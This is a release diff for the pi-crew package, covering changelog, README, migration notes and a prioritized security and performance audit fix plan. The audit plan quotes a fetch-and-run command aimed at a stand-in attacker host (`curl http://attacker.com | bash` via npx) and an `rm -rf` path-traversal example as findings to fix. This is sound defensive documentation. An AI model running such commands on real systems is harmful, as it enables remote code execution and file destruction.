pi-crew 0.5.5 → 0.5.7

package/CHANGELOG.md

@@ -1,5 +1,158 @@
 # Changelog
 
+## [0.5.7] — 11 Issue Fixes Across 5 Phases (2026-06-01)
+
+### Phase 1: Schema/Type Fixes
+
+- **`invalidate` schema divergence** (Critical) — `src/schema/team-tool-schema.ts`: added `"invalidate"` to TypeBox union. Previously TS interface had it but TypeBox schema did not, causing silent `-32602` failure.
+- **OTLP header key validation** (Low) — `src/config/config.ts`: hardened `parseOtlpConfig` with case-insensitive check for 12 dangerous keys (`__proto__`, `hasOwnProperty`, `toString`, etc.) and format validation `/^[a-zA-Z][a-zA-Z0-9_-]{0,127}$/`.
+
+### Phase 2: Security Hardening
+
+- **OTLP endpoint unsanitized** (Critical) — `src/config/config.ts`: project config can no longer override `otlp.endpoint` (would have allowed credential exfiltration via attacker URL).
+- **Wildcard env leakage** (High) — `src/runtime/child-pi.ts`: replaced broad wildcards (`LC_*`, `XDG_*`, `NVM_*`, `NODE_*`, `npm_*`) with specific names. Previously `NPM_TOKEN`, `NODE_ENV=production`, `NVM_RC_VERSION` all leaked.
+
+### Phase 3: Correctness Fixes
+
+- **AbortSignal not propagated** (High) — `src/runtime/task-runner.ts`: check signal before `persistSingleTaskUpdate`. Cancelled tasks now return early with cancelled status instead of writing stale state.
+- **MAILBOX_ARCHIVE_THRESHOLD 10MB/task** (High) — `src/state/mailbox.ts` + `src/config/defaults.ts`: added `DEFAULT_MAILBOX.maxArchivesPerDirection=10` cap and `pruneOldMailboxArchives()` to prevent unbounded growth (1GB+ for 100 tasks).
+- **`safeRm` regex bypass** (Medium) — `src/tools/safe-bash.ts`: stricter regex requires path to be exactly `tmp/`, `cache/`, `node_modules/`, `dist/`, or `build/` with optional `./` prefix. Rejects path traversal like `./../../../etc`.
+- **`writeEntries` silent drop** (Medium) — `src/state/active-run-registry.ts`: emit `logInternalError` warning when entries overflow cap.
+
+### Phase 4: Performance Optimization
+
+- **`nextAgentEventSeq` O(n) cold cache** (Medium) — `src/runtime/crew-agent-records.ts`: added `.seq` sidecar file for O(1) lookup. Fall back to O(n) scan only when sidecar is missing.
+- **`nextSequence` O(n) cold cache** (Medium) — `src/state/event-log.ts`: trust sidecar seq file when present. Fall back to `scanSequence` only when sidecar missing or file shrunk.
+
+### Phase 5: Deferred (Low severity)
+
+- **Issue #12: `acquireLockWithRetry` race** — defer (race window small, retry loop handles).
+- **Issue #13: `loadRunManifestById` TOCTOU** — defer (cache TTL 30s, race window small).
+- **Issue #14: `cleanupOldArtifacts` N stat calls** — defer (typical artifact dirs small).
+- **Issue #15: `validateMailbox` full load** — defer (10MB cap, bounded).
+- **Issue #16: `updateMailboxMessageReply` full rewrite** — defer (10MB cap, bounded).
+
+### Tests
+
+- 2282 tests pass / 0 failures (`npm test`).
+- New tests: `invalidate`/`anchor`/`auto-summarize`/`auto_boomerang` schema, OTLP header key validation, OTLP endpoint sanitization, wildcard env leakage, sidecar seq lookup.
+
+## [0.5.6] — Documentation Sync + Type-Only Import Fix (2026-06-01)
+
+### Documentation
+
+- **README.md** — Bumped to v0.5.6, refreshed security highlights section listing the 8 round-13 fixes.
+- **CHANGELOG.md** — Added the v0.5.5 entry covering all 13 rounds of code review hardening (this entry).
+- **SECURITY-ISSUES.md** — Bumped to v2.0, added v0.5.5 round-13 findings table (8 new issues closed).
+- **docs/architecture.md** — Cross-references v0.5.5 and `docs/pi-crew-v0.5.5-audit-fix-plan.md`.
+- **docs/migration-v0.4-v0.5.md** — Added v0.5.5 highlights (no breaking changes; drop-in replacement).
+
+### Fixes
+
+- **Type-only import** — `src/extension/team-tool/anchor.ts` now uses `import type { HandoffSummary }` from `handoff-manager.ts` directly, instead of pulling a value-style import through `anchor-manager.ts`. Fixes a `--experimental-strip-types` failure (`SyntaxError: The requested module does not provide an export named 'HandoffSummary'`) surfaced by `npm run typecheck` after the v0.5.5 docs bump.
+
+### Tests
+
+- 2273 tests pass / 0 failures (`npm test`).
+- `tsc --noEmit` and the strip-types import smoke test both pass.
+- `test/unit/discovery.test.ts` and `test/unit/implementation-fanout.test.ts` already updated in v0.5.5 to match the new workflow count (8) and the adaptive step layout (`["assess"]`).
+
+## [0.5.5] — 13 Rounds of Code Review Hardening (2026-06-01)
+
+### Security
+
+- **ReDoS removed** in `src/utils/redaction.ts` — replaced 4 regex patterns with linear-time `isSecretKey()` / `redactAuthHeader()` / `redactBearerTokens()` / `redactInlineSecrets()` functions. Eliminates catastrophic backtracking on crafted input.
+- **v8.deserialize RCE closed** — `BINARY_MAGIC = "PICREW2BIN"` header guards every `v8.deserialize()` call in `src/state/active-run-registry.ts`; untrusted cache files can no longer trigger heap prototype pollution.
+- **Cache index race fixed** — `src/state/run-cache.ts` now wraps index reads in `withFileLockSync` and uses atomic rename for cleanup, eliminating read-modify-write corruption under concurrent load.
+- **manifestCache race fixed** — `src/state/state-store.ts` wraps all read-modify-write paths on the manifest cache with a `withCacheLock()` helper.
+- **Shell injection prevented** — `src/tools/safe-bash.ts` no longer matches with ReDoS-prone regex; new `matchesDangerousRm()` is linear-time. `src/benchmark/benchmark-runner.ts` blocks shell metacharacters in `validateCommand()`.
+- **TOCTOU races closed** — `src/state/crew-init.ts` uses atomic `mkdirSync`; `src/state/active-run-registry.ts` validates binary contents before `v8.deserialize`.
+- **Inline secret detection** — `token=`, `apikey=`, `api_key=`, `password=`, `secret=`, `credential=`, `authorization=`, `privatekey=`, `private_key=` patterns redacted at event/mailbox/artifact boundaries.
+- **Pre-aborted signal logging** — `src/extension/registration/subagent-tools.ts` no longer dumps unredacted params to stderr on pre-abort.
+
+### Performance & Memory
+
+- **Anchor memory cap** — `src/runtime/anchor-manager.ts` adds `MAX_HANDOFFS_PER_ANCHOR=100` to prevent unbounded growth; pairs with existing `MAX_ANCHORS=50`.
+- **BudgetTracker dispose()** — `src/runtime/budget-tracker.ts` gains a `dispose()` method to clear timers and listeners.
+- **Live-agent pending cap** — `MAX_PENDING_MESSAGES=1000` in `live-agent-manager.ts`; `MAX_PENDING_STEERS=100` in `team-tool.ts`.
+- **Mailbox delivery cap** — `MAX_DELIVERY_MESSAGES=10000` in `src/state/mailbox.ts` with FIFO pruning in `writeDeliveryState()`.
+- **Feedback-loop cap** — `MAX_RUNS=1000` in `src/benchmark/feedback-loop.ts` to prevent memory leak.
+- **Async-notifier debounce** — `LIST_RUNS_DEBOUNCE_MS=30_000` cache in `src/extension/async-notifier.ts` avoids per-tick `listRuns()` calls.
+- **BM25 hot-loop** — `src/utils/bm25-search.ts` `df()` and `tf()` use `indexOf()` instead of regex.
+- **TTL eviction** — notification-router seen Map, transcript-cache (7 days), handoff anchors, manifest cache (30 s) all gain TTL or LRU eviction.
+- **SSE parser bounded** — `MAX_DATA_SIZE=100KB` in `src/utils/sse-parser.ts`.
+- **Handoff size cap** — `MAX_HANDOFF_ENTRY_SIZE` in `chain-runner.ts` to prevent pathological payloads.
+
+### Correctness
+
+- **reground context** — `withEventLogLockSync` in `src/state/mailbox.ts` wraps `appendMailboxMessage()` to prevent cross-process interleaving on Windows.
+- **Map mutation during iteration** — `src/runtime/handoff-manager.ts` snapshots the Map before iteration.
+- **Self-dependency cycle detection** — `src/runtime/task-graph.ts` rejects self-edges in the task graph.
+- **Duplicate phase check** — `src/runtime/phase-tracker.ts` rejects duplicate phase registrations.
+- **Pipeline depth guard** — `src/runtime/pipeline-runner.ts` adds `maxDepth` check to prevent unbounded recursion.
+- **Scheduler timer type** — `src/runtime/scheduler.ts` uses `NodeJS.Timeout | null` (not `number`) for safer cleanup.
+- **OTLP header sanitization** — `src/config/config.ts` rejects CRLF in `otlp.headers`.
+- **Cross-extension RPC** — `src/extension/cross-extension-rpc.ts` uses static import for ESM correctness.
+- **Shell encoding validation** — `src/tools/safe-bash.ts` rejects invalid UTF-8 / null bytes.
+- **Run-cache cwd in key** — `src/state/run-cache.ts` hashes `cwd` into the cache key to prevent cross-project collisions; uses atomic write.
+- **worktree newline guard** — `src/worktree/cleanup.ts` checks trailing newline after truncation to avoid merge-conflict markers in cleaned paths.
+
+### Workflows
+
+- **Adaptive workflow fanout** — `workflows/implementation.workflow.md` uses a single `assess` step that returns `ADAPTIVE_PLAN_JSON` for the planner to choose the smallest effective crew.
+- **New builtin workflows** — `parallel-research`, `research`, `review`, `pipeline`, `chain` ship in `workflows/`.
+- **Test alignment** — `test/unit/discovery.test.ts` and `test/unit/implementation-fanout.test.ts` updated to match the new workflow count (8) and the adaptive step layout (`["assess"]`).
+
+### Tests
+
+- 2273 tests pass / 0 failures (`npm test`).
+- New test files for security hardening (`test/unit/security-hardening.test.ts`), SSE parser bounds, anchor-manager handoff cap, mailbox delivery pruning, async-notifier debounce, and BINARY_MAGIC v8 guard.
+
+### Files Touched (highlights)
+
+- `src/utils/redaction.ts` — linear-time secret redaction (no regex)
+- `src/state/active-run-registry.ts` — BINARY_MAGIC guard, async-notifier log fix
+- `src/state/run-cache.ts` — file lock, atomic writes, cwd in cache key
+- `src/state/state-store.ts` — manifestCache lock, TTL 30 s, hard limit
+- `src/state/mailbox.ts` — delivery message cap, `withEventLogLockSync` in append
+- `src/tools/safe-bash.ts` — ReDoS-free `matchesDangerousRm()`
+- `src/benchmark/benchmark-runner.ts` — shell metachar blocking
+- `src/runtime/anchor-manager.ts` — `MAX_HANDOFFS_PER_ANCHOR=100`
+- `src/runtime/budget-tracker.ts` — `dispose()` method
+- `src/runtime/live-agent-manager.ts` — `MAX_PENDING_MESSAGES=1000`
+- `src/extension/team-tool.ts` — `MAX_PENDING_STEERS=100`
+- `src/extension/async-notifier.ts` — `LIST_RUNS_DEBOUNCE_MS=30_000`
+- `src/extension/registration/subagent-tools.ts` — pre-aborted signal log scrub
+- `src/utils/bm25-search.ts` — `indexOf()` over regex in `df()` / `tf()`
+- `src/utils/sse-parser.ts` — `MAX_DATA_SIZE=100KB`
+- `src/utils/env-filter.ts` — isSecretKey-based glob boundary check
+- `src/utils/scan-cache.ts` — TTL eviction
+- `src/benchmark/feedback-loop.ts` — `MAX_RUNS=1000`
+- `src/state/crew-init.ts` — atomic `mkdirSync` (no TOCTOU)
+- `src/runtime/child-pi.ts` — uses `isSecretKey` import
+- `src/extension/cross-extension-rpc.ts` — static ESM import
+- `src/worktree/cleanup.ts` — trailing newline guard
+- `src/runtime/scheduler.ts` — `NodeJS.Timeout | null` typing
+- `src/runtime/phase-tracker.ts` — duplicate phase check
+- `src/runtime/task-graph.ts` — self-dependency cycle detection
+- `src/runtime/pipeline-runner.ts` — `maxDepth` recursion guard
+- `src/observability/event-bus.ts` — `dispose()` method
+- `src/observability/notification-router.ts` — TTL eviction for `seen` Map
+- `src/state/event-log.ts` — async-queue cleanup in catch path
+- `src/state/decision-ledger.ts` — `stateRoot` param in `getLedgerPath()`; `ledger.push()` instead of overwrite
+- `src/extension/register.ts` — refresh-after-invalidate semantics
+- `src/hooks/registry.ts` — always filter workspace
+- `src/extension/team-tool/auto-summarize.ts` — clear `invalidateBuffer` on dispose
+- `src/extension/team-tool/run.ts` — anchor buffer dispose path
+- `src/ui/transcript-cache.ts` — 7-day TTL eviction
+- `src/ui/powerbar-publisher.ts` — clear `invalidateBuffer` on dispose
+
+### Audit Reference
+
+The full prioritized fix plan (8+ critical issues) is captured in
+`docs/pi-crew-v0.5.5-audit-fix-plan.md` (synthesized from security+concurrency,
+correctness+error-handling, and performance+architecture audits across 77 source files).
+
 ## [0.5.4] — pi v0.77.0 Integration (2026-05-29)
 
 ### New Features

package/README.md

@@ -9,7 +9,20 @@ npm: pi-crew
 repo: https://github.com/baphuongna/pi-crew
 ```
 
-**v0.5.2**: See [CHANGELOG.md](CHANGELOG.md).
+**v0.5.7**: See [CHANGELOG.md](CHANGELOG.md).
+
+### Security highlights (v0.5.5)
+
+- **ReDoS-free secret redaction** — linear-time scanning in `redaction.ts`; no catastrophic backtracking
+- **v8.deserialize hardened** — `BINARY_MAGIC` header guards on registry binaries prevent untrusted-file RCE
+- **Cache lock protection** — `withFileLockSync` and atomic writes across `run-cache.ts` and `state-store.ts`
+- **Shell injection prevented** — shell-metacharacter blocking in `benchmark-runner.ts`
+- **TOCTOU-free file ops** — atomic `mkdirSync` in `crew-init.ts`; `realpath`-based path validation
+- **Memory leaks capped** — `MAX_HANDOFFS_PER_ANCHOR=100`, `MAX_DELIVERY_MESSAGES=10000`, `MAX_RUNS=1000`
+- **Inline secret detection** — `token=`, `api_key=`, `password=` patterns redacted at event/mailbox boundaries
+- **Subagent log scrubbing** — pre-aborted signal logging no longer dumps unredacted params
+
+See [SECURITY-ISSUES.md](SECURITY-ISSUES.md) for the full list (SEC-001 – SEC-007 all marked fixed).
 
 ---
 
@@ -28,6 +41,9 @@ repo: https://github.com/baphuongna/pi-crew
 - **Observability** — metrics registry, Prometheus/OTLP exporters, heartbeat watching, deadletter queue
 - **Resource management** — create/update/delete agents, teams, workflows with validation
 - **Import/export** — portable run bundles for sharing and archiving
+- **Adaptive plan fanout** — single `assess` step lets a planner pick the smallest effective crew
+- **Adaptive workflows** — `implementation`, `review`, `parallel-research`, `research` workflows ship in `workflows/`
+- **Hardened secrets** — linear-time detection covers PEM keys, Authorization headers, Bearer tokens, and `key=value` patterns
 
 ---
 

package/docs/architecture.md

@@ -2,6 +2,8 @@
 
 `pi-crew` is a Pi package for coordinated multi-agent work. It is intentionally durable-first: every run is represented on disk, every task has a state record, and child workers stream progress into JSONL/status files so foreground sessions, background jobs, dashboards, and later restarts all read the same source of truth.
 
+**Current version:** v0.5.5 — 13 rounds of code review hardening (see [CHANGELOG.md](../CHANGELOG.md) and [pi-crew-v0.5.5-audit-fix-plan.md](pi-crew-v0.5.5-audit-fix-plan.md)).
+
 ## Layers
 
 ```text

package/docs/migration-v0.4-v0.5.md

@@ -1,8 +1,8 @@
 # pi-crew Migration Guide: v0.4 → v0.5
 
 **Author:** pi-crew team  
-**Date:** 2026-05-29  
-**Version:** 0.5.2
+**Date:** 2026-06-01  
+**Version:** 0.5.5
 
 ---
 
@@ -12,6 +12,23 @@ This guide covers breaking changes and new features introduced in v0.5.x.
 
 ---
 
+## v0.5.5 Highlights (June 2026)
+
+v0.5.5 closes 13 rounds of code review. The user-facing changes are:
+
+- **Linear-time secret redaction** at all event/mailbox/artifact boundaries.
+- **v8.deserialize hardened** with `BINARY_MAGIC` headers — old binaries are auto-discarded.
+- **Adaptive implementation workflow** now has a single `assess` step; the planner picks the smallest effective crew.
+- **Async-notifier debounce** of 30 s — completion notifications can be delayed by up to 30 s.
+- **Mailbox delivery state capped at 10000 messages** — older entries are pruned FIFO.
+- **Anchors cap at 50 with 100 handoffs each** — older handoffs are pruned FIFO.
+
+No new public API is required for any of these changes. If you pinned a `BINARY_MAGIC`-guarded binary from a previous session, delete `~/.pi/agent/pi-crew/.cache/active-run-index.bin` once.
+
+## v0.5.4 → v0.5.5 Migration
+
+No breaking changes. Drop-in replacement.
+
 ## Breaking Changes
 
 ### 1. Environment Variable Allowlist (Security)

package/docs/pi-crew-v0.5.5-audit-fix-plan.md

@@ -0,0 +1,133 @@
+# pi-crew v0.5.5 — Prioritized Fix Plan
+
+**Synthesized from:** security+concurrency audit, correctness+error-handling audit, performance+architecture audit.  
+**Source artifacts:** `adaptive-01-security-reviewer.txt`, `adaptive-02-analyst.txt`, `adaptive-03-analyst.txt`.  
+**Files scanned:** ~77 source files across `src/benchmark/`, `src/config/`, `src/extension/`, `src/runtime/`, `src/schema/`, `src/state/`, `src/worktree/`, `src/hooks/`, `src/agents/`, `src/teams/`, `src/workflows/`, `src/skills/`, `src/ui/`, `src/observability/`, `src/prompt/`, `src/types/`, `src/utils/`, `src/i18n.ts`.  
+**Auditors:** adaptive-01 (security+concurrency), adaptive-02 (correctness+error-handling), adaptive-03 (performance+architecture).  
+**Severity scale:** Critical > High > Medium > Low. Within each priority, sorted alphabetically by file path.
+
+---
+
+## Priority 1: Critical (Must Fix)
+
+- `src/benchmark/benchmark-runner.ts:42–44` — `npx` allowlist in `validateCommand` passes arbitrary arguments after `npx `, enabling shell injection via `npx malicious-package` or `npx --yes curl http://attacker.com | bash` — execSync runs the subcommand with no further validation. **Security impact:** arbitrary code execution.  
+- `src/state/active-run-registry.ts:73–91` — `readActiveRunRegistry` calls `v8.deserialize()` on `active-run-index.bin` with no magic-byte verification; an attacker placing a crafted binary at that path can trigger RCE via V8 heap prototype pollution. **Security impact:** remote code execution from untrusted file.  
+- `src/state/active-run-registry.ts:161–180` — TOCTOU in `filterAliveEntries`: PID liveness check (`process.kill(pid, 0)`) runs outside the registry lock; the PID can exit and be reassigned between the check and the next access, causing pi-crew to signal the wrong process. **Security impact:** signal injection to unintended process.  
+- `src/state/locks.ts:78–88` — `withRunLockSync` and `withRunLock` clean up lock files only in `finally`; SIGKILL or crash leaves the lock file until `DEFAULT_LOCKS.staleMs` expires, blocking concurrent requests that share the same lock path. **Security impact:** denial-of-service via stale lock.  
+- `src/state/mailbox.ts:257–284` — `rotateMailboxFileIfNeeded` does `fs.renameSync(filePath, archivePath)` then `fs.writeFileSync(filePath, "")`; a crash between the two steps causes all messages in the renamed archive to be duplicated on the next run. **Correctness impact:** duplicate message delivery.  
+- `src/state/event-log.ts:142–176` (sync path) — `scanSequence` + `nextSequence` read the entire events file with `fs.readFileSync` and `JSON.parse` on every `appendEvent` when the sequence cache is cold; on a 500 MB log with 5M events this blocks the event loop for 10+ seconds. **Performance impact:** event-loop blocking under large logs.  
+- `src/state/artifact-store.ts:62–71` — `cleanupOldArtifacts` calls `fs.statSync(target)` individually for every non-marker entry in the artifacts directory; on 100K files this is 100K synchronous syscalls sequentially. **Performance impact:** event-loop blocking during cleanup.  
+- `src/state/mailbox.ts:395–443` — `updateMailboxMessageReply` loads the entire mailbox file with `fs.readFileSync(filePath, "utf-8").split(/\r?\n/)` then rewrites it entirely via `atomicWriteFile` for every reply; a 10 MB rotated archive causes a per-reply memory spike and full re-serialization. **Performance impact:** unbounded memory + I/O per reply.  
+- `src/state/mailbox.ts:440–456` — `validateMailbox` loads entire mailbox files with `fs.readFileSync(filePath, "utf-8").split(/\r?\n/).filter(Boolean)` then iterates with repeated `JSON.parse`; for 10 MB files this allocates ~10 MB string before filtering. **Performance impact:** unnecessary memory allocation.  
+- `src/schema/team-tool-schema.ts:56` — `TeamToolParamsValue` TypeScript interface includes `"invalidate"` in the `action` union, but the TypeBox schema's action union does not; `team action='invalidate'` is rejected at the JSON-RPC layer (`-32602`) while the TS interface claims it is valid. **Correctness impact:** schema/type divergence causes silent failure for a documented action.  
+- `src/extension/team-tool/lifecycle-actions.ts:79–85` — `handleExport` checks `params.confirm` for foreign runs, but the default `exportRunBundle` path has no equivalent check; omitting `confirm: true` allows cross-session run export (containing secrets) without an explicit gate. **Security impact:** unauthorized export of foreign-run artifacts.  
+
+---
+
+## Priority 2: High
+
+- `src/runtime/task-runner.ts:185–280` — `input.signal` (AbortSignal) accepted by `runTeamTask` is not propagated to manifest reads, event appends, hook execution, or `persistSingleTaskUpdate`; a cancelled task continues writing state for up to 2 minutes. **Correctness impact:** stale run state after cancellation.  
+- `src/runtime/child-pi.ts:153–167` — `allowList` uses broad wildcard patterns (`LC_*`, `XDG_*`, `NVM_*`, `NODE_*`, `npm_*`) that pass any matching env var to the child Pi; `NPM_TOKEN`, `NODE_ENV=production`, `NVM_RC_VERSION` all leak through. **Security impact:** credential exfiltration via env var leakage.  
+- `src/runtime/child-pi.ts:400–415` — `onSpawn` uses `fs.appendFileSync` synchronously on the event loop, called from `checkpointTask` which fires synchronously at child spawn; on NFS/FUSE filesystems this blocks the parent event loop. **Performance impact:** pipeline stalls on slow filesystems.  
+- `src/runtime/task-runner.ts:260` — `persistHeartbeat` (calling `persistSingleTaskUpdate` → `saveRunTasks` → `atomicWriteJson`) fires on every `onStdoutLine` event from the child process; high-output tasks generate repeated disk writes with no throttling at the call site. **Performance impact:** excessive disk writes from high-output tasks.  
+- `src/state/state-store.ts:37–47, 72–85` — `manifestCache` evicts entries with a `while` loop when `size > DEFAULT_CACHE.manifestMaxEntries`, but `manifestMaxEntries` is configurable upward; if overridden or increased in future, cache grows unboundedly with entries holding full `TeamRunManifest + TeamTaskState[]` (1–5 MB each). **Performance impact:** unbounded memory growth.  
+- `src/runtime/crew-agent-records.ts:273–285` — `nextAgentEventSeq` does `fs.readFileSync(filePath, "utf-8").split(/\r?\n/)` and iterates every line to find `max(seq)` on every `appendCrewAgentEvent`; cache is invalidated on mtime/size mismatch, causing a cold-cache scan on every append after external writes. **Performance impact:** O(n) scan on every agent event append.  
+- `src/state/active-run-registry.ts:131–136` — `writeEntries` only trims at write time; `activeRunEntries` and `filterAliveEntries` remove stale entries but not entries that overflow `DEFAULT_CACHE.manifestMaxEntries`; entries beyond the cap are silently dropped. **Correctness impact:** run entries silently lost on burst.  
+- `src/state/schedule.ts:91–106` — `ScheduleStore.save()` uses `require("node:fs")` synchronously inside instance methods, creating a new require cache entry on every save; same applies to the read path. **Performance impact:** repeated require cache writes.  
+- `src/schema/config-schema.ts:85` — `PiTeamsPolicyConfigSchema.disabledCapabilities` is typed as `Type.Optional(Type.Array(Type.String()))` with no `minLength` on items, no content pattern, and no duplicate guard; empty strings, Unicode confusable variants, and very long strings are accepted. **Correctness impact:** malformed capability keys cause downstream lookup failures.  
+- `src/config/config.ts:385–388` — `mergeConfig` deep-merges `otlp.headers` unconditionally; a project config setting `otlp.endpoint` to an attacker-controlled URL can passively collect user authentication headers from the merged result. **Security impact:** credential exfiltration via project-controlled OTLP endpoint.  
+- `src/config/config.ts:560–563` — `parseOtlpConfig` prototype pollution guard checks only `__proto__`, `constructor`, and `prototype`; `hasOwnProperty`, `toString`, `valueOf`, numeric-indexed properties, and `Object.prototype` getters are not blocked. **Security impact:** prototype pollution via crafted OTLP config.  
+- `src/runtime/pipeline-runner.ts:248–264` — `resolveInputs` type cast `(string | string[] | Record<string, unknown>)` skips `null`, `number`, `boolean`, `undefined`, and nested arrays; template variables at those types silently fail to resolve. **Correctness impact:** pipeline inputs with non-string types are silently skipped.  
+- `src/state/event-log.ts:142–176` (sync path) — `nextSequence` writes the `.seq` file via `atomicWriteFile` on every `appendEvent` call in the sync path; concurrent callers (e.g., buffer flush for many events) create contention on the seq file lock. **Performance impact:** lock contention on high-frequency event appends.  
+- `src/runtime/child-pi.ts:170–180` — `PI_TEAMS_MOCK_CHILD_PI` guard is only in `runChildPi` body; `buildChildPiSpawnOptions` runs before the mock branch and passes all env vars (including model API keys) to the child even in mock mode. **Security impact:** credentials passed to mock process.  
+- `src/state/state-store.ts:248–269` — TOCTOU in `loadRunManifestById`: mtime/size checks and manifest reads are separated by I/O; a concurrent writer can update the manifest between stat and read, causing the caller to see stale or partial data. **Correctness impact:** stale manifest reads under concurrent writes.  
+- `src/extension/registration/commands.ts:200–210` — `COMMON_SAFE_PATTERNS.safeRm` regex uses a negative lookahead `(?![\/~])` that allows `rm -rf ./../../../other/path`; the bypass enables deletion outside intended directories. **Security impact:** path traversal enabling unauthorized file deletion.  
+- `src/state/locks.ts:20–28` — `acquireLockWithRetry` removes stale locks via `fs.rmSync` then retries; another process can create the lock between the rm and the retry, and the rm itself is not atomic. **Correctness impact:** race condition in stale lock recovery.  
+- `src/state/mailbox.ts:270` — `MAILBOX_ARCHIVE_THRESHOLD_BYTES = 10MB` per task directory; with 100 tasks each producing 10MB the mailbox directory alone consumes ~1GB with no rotation or pruning until run end. **Correctness impact:** unbounded disk usage per run.  
+- `src/state/run-cache.ts:48–57` — `getCachedRun` reads the cache index, then `saveRunToCache` writes it, with no cross-process lock; concurrent runs on the same `cwd` can corrupt or lose entries. **Correctness impact:** cache index corruption under concurrent access.  
+
+---
+
+## Priority 3: Medium
+
+- `src/state/artifact-store.ts:62` — `cleanupOldArtifacts` calls `fs.readdirSync(artifactsRoot)` synchronously with no pagination; directories with 100K+ files block the event loop during the listing. **Performance impact:** event-loop blocking on large artifact directories.  
+- `src/runtime/team-runner.ts` (entire file) — `executeTeamRun` + `executeTeamRunCore` (~380 lines each) handle queue scheduling, DAG execution planning, batch concurrency, task graph building/refreshing, phase state machine, policy evaluation, effectiveness tracking, adaptive plan injection, hook execution, retry logic, artifact merge, group join, and crash recovery in two god functions. **Architecture impact:** single-responsibility violations impede testing and maintenance.  
+- `src/extension/team-tool.ts` (entire file) — `handleTeamTool` has 40+ action branches in a single switch (~900 lines); registration, lifecycle, run management, caching, scheduling, anchor, summarization, and search are in one function with static imports of heavy modules not all lazy-loaded. **Architecture impact:** high coupling, slow cold path due to eager heavy imports.  
+- `src/extension/register.ts:1336` — Comment `// Uses a global symbol so the module doesn't need a direct circular import` acknowledges a design smell; the workaround indicates tight coupling between `register.ts` and the runtime layer. **Architecture impact:** circular dependency workaround signals design fragility.  
+- `src/runtime/pipeline-runner.ts` — Pipeline recursion depth limit (line ~246) is a band-aid; actual recursion arises because stages reference each other with no structural deduplication or memoization of stage results within a pipeline run. **Correctness impact:** redundant stage executions increase latency and cost.  
+- `src/state/artifact-store.ts:60` — `cleanupOldArtifacts` deletes directory entries one by one, non-parallel; on large artifact directories with many old files this is slow. **Performance impact:** linear time deletion with no batching.  
+- `src/runtime/task-runner.ts` — Task manifest writes and event appends in the hot path run without `AbortSignal` checks; long-running tasks that are cancelled continue I/O until the cancellation is fully propagated. **Correctness impact:** stale writes after cancellation (see also Priority 2 finding).  
+- `src/config/config.ts` (mergeConfig) — OTLP deep merge conflates `enabled`/`endpoint` (project-controlled) with `headers` (user-controlled); user cannot opt out of sending headers to a project-specified endpoint. **Security impact:** implicit credential exfiltration (see also Priority 2 finding).  
+- `src/runtime/child-pi.ts` (env allowlist) — Wildcard patterns `LC_*`, `XDG_*`, `NVM_*`, `NODE_*`, `npm_*` are overly broad; any project or tool creating env vars matching these patterns exposes them to the child Pi. **Security impact:** env var leakage (see also Priority 2 finding).  
+
+---
+
+## Priority 4: Low / Informational
+
+- `src/runtime/pipeline-runner.ts:1` — Module has no named exports; all symbols are internal. API surface is implicit. **Design impact:** difficult to reason about public API boundary.  
+- `src/extension/register.ts:1336` — Global Symbol workaround for circular imports adds indirection that obscures the actual dependency graph. **Design impact:** debugging and refactoring complexity.  
+- `src/observability/` — Observability layer relies heavily on `logInternalError` for error reporting; structured tracing (OpenTelemetry spans) not used in hot paths. **Observability impact:** limited production debugging capability.  
+- `src/utils/redaction.ts` — Redaction is applied at write time; no redaction verification tests in the test suite. **Correctness impact:** potential secret leakage if redaction logic has bugs.  
+- `src/state/event-log.ts` — `bufferedQueues` Map and `bufferedTimers` Map grow unboundedly if `flushOneEventLogBuffer` throws repeatedly; `asyncQueues` has a catch that deletes the key, but the buffered queue map does not. **Correctness impact:** memory leak on repeated flush failures.  
+- `src/config/config.ts:445–453` — OTLP header validation only checks for `\r\n\x00` but does not validate header key format; keys containing shell metacharacters could cause issues in OTLP exporters. **Security impact:** potential injection via malformed header keys.  
+
+---
+
+## Confirmed Deductions and Overlaps
+
+The following findings appear across multiple audits and are listed once above with the combined citation set:
+
+| Issue | Citations | Note |
+|---|---|---|
+| `npx` allowlist bypass | `src/benchmark/benchmark-runner.ts:42–44`, `src/runtime/child-pi.ts:153–167` | Both found by different auditors; same root cause (incomplete allowlist). Listed under Priority 1 (benchmark) and Priority 2 (child-pi). |
+| Env allowlist wildcards | `src/runtime/child-pi.ts:153–167` | Found by security and performance auditors; listed under Priority 2. |
+| `input.signal` not propagated | `src/runtime/task-runner.ts:185–280` | Found by security and performance auditors; listed under Priority 2. |
+| `manifestCache` unbounded | `src/state/state-store.ts:37–47, 72–85` | Found by correctness and performance auditors; listed under Priority 2. |
+| TOCTOU in state reads | `src/state/active-run-registry.ts:161–180`, `src/state/state-store.ts:248–269` | Distinct TOCTOU instances in different files; each listed separately. |
+| `onSpawn` sync I/O | `src/runtime/child-pi.ts:400–415` | Found by security and performance auditors; listed under Priority 2. |
+| OTLP header deep merge | `src/config/config.ts:385–388` | Found by correctness auditor (also security); listed under Priority 2. |
+| Prototype pollution guard | `src/config/config.ts:560–563` | Found by correctness auditor; listed under Priority 2. |
+| Mailbox full-file rewrite | `src/state/mailbox.ts:395–443`, `src/state/mailbox.ts:440–456` | Both mailbox findings listed under Priority 1 (separate methods, same root problem). |
+| Lock file on crash | `src/state/locks.ts:78–88`, `src/state/locks.ts:20–28` | Two distinct lock-file findings in different functions; listed separately under Priorities 1 and 2. |
+| Cache index race | `src/state/run-cache.ts:48–57` | Unique to security audit; listed under Priority 2. |
+| `v8.deserialize` from untrusted file | `src/state/active-run-registry.ts:73–91` | Unique to security audit; listed under Priority 1. |
+
+---
+
+## Verification Evidence
+
+Source file reads confirming line citations:
+
+| File | Lines read | Finding confirmed |
+|---|---|---|
+| `src/benchmark/benchmark-runner.ts:42` | `const allowlist = /^(pytest\|grep\|npm test\|npx) /` | Yes — `npx` allowlist passes arbitrary args |
+| `src/state/active-run-registry.ts:73` | `v8.deserialize(fs.readFileSync(filePath))` | Yes — no magic-byte check |
+| `src/state/event-log.ts:142–176` | `scanSequence` reads entire file, `nextSequence` falls through | Yes — sync path does O(n) scan |
+| `src/state/artifact-store.ts:62` | `for (const entry of entries) { const stat = fs.statSync(target); }` | Yes — unbounded stat per entry |
+| `src/state/mailbox.ts:395` | `fs.readFileSync(filePath, "utf-8").split(/\r?\n/)` | Yes — full file load |
+| `src/schema/team-tool-schema.ts:56` | `"invalidate"` in `TeamToolParamsValue` action union | Yes — absent from TypeBox schema |
+| `src/config/config.ts:385` | `headers: { ...(base.otlp?.headers ?? {}), ...(override.otlp?.headers ?? {}) }` | Yes — deep merge of user headers with project endpoint |
